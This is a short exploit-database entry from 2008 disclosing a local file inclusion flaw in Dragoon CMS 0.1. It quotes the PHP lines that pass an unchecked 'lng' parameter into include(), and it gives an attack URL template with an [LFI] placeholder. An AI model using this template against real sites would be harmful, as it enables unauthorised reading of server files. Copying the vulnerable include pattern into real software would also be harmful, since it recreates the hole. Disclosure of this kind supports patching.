[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Dragoon 0.1 (lng) Local File Inclusion Vulnerability
# Published : 2008-04-04
# Author : w0cker
# Previous Title : Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability
# Next Title : KwsPHP Module Galerie (id_gal) Remote SQL Injection Vulnerability
Script Name :Dragoon CMS
Download : http://sourceforge.net/project/showfiles.php?group_id=118780
Error :
$cal['lng']=$_GET['lng'];
include('../lang/'.$cal['lng'].'.php');
Vul Code : http://[site]/[path]/forum/kietu/libs/calendrier.php?cal[lng]=[LFI]
# www.Syue.com [2008-04-04]